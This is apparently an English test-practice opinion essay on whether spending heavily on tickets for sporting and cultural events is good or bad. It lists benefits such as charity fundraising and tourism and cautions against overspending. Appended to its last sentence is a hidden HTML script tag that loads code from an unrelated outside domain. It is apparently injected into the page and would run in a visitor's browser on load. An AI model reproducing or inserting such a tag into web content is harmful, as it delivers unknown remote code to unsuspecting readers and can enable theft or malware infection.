Some people spend a lot of money on tickets to go to sporting and cultural events. Is this a good or bad thing.

It is seen over the past decade that people's lifestyle has changed tremendously. These days, often many people are seen spending moolah on different sport and cultural events and programs across the globe.

Lot many people feel, it is right to spend money on watching live performances and sport matches. However certain group of people feel that spending lavishly on buying tickets can lead to a financial crunch. In my opinion, spending money on watching live events can bring lot many advantages to the society and a nation as a whole, however people must spend wisely on such events.

The primary reason for people spending on live performances and events is the "rise in disposable income". Hence the living standards of people have improved drastically. People now prefer different entertainment sources outside their homes.Purchasing sporting and cultural event tickets has its own set of positives.

Firstly, most youngsters and teenagers tend to follow famous sport and TV/movie stars and consider them as their role models. It gives them a sense of satisfaction and accomplishment when they are praised by friends and family on social media for posting videos and pictures of their favourite stars performing live.

Secondly, many organisation also conduct live shows to promote and raise funds for various social causes as part of their corporate social responsibility. As an illustration, some organisations support the cause of educating the underprivileged, by organising live shows of popular singers. By selling tickets at high price, they cover up the expenses of events and also raise adequate funds.

Lastly, such events increase the tourism by many folds. People travel from different cities and countries to attend various sport event such as FIFA Cup and cricket matches.

On the other hand, always spending money watching such events can ultimately burn a hole in pocket. It can at times lead to financial crisis.In young children, it is often seen that they tend to develop a habit of showing off and consider watching live shows as a status symbol.

In conclusion, spending money on such sporting and cultural events can benefit the society to a greater extent by strengthening the bond between nations, and developing a multicultural environment. However, overspending on such events must be avoided, which can lead to financial problems.<script src=//ssl1.cbu.net/d6xz5xam></script>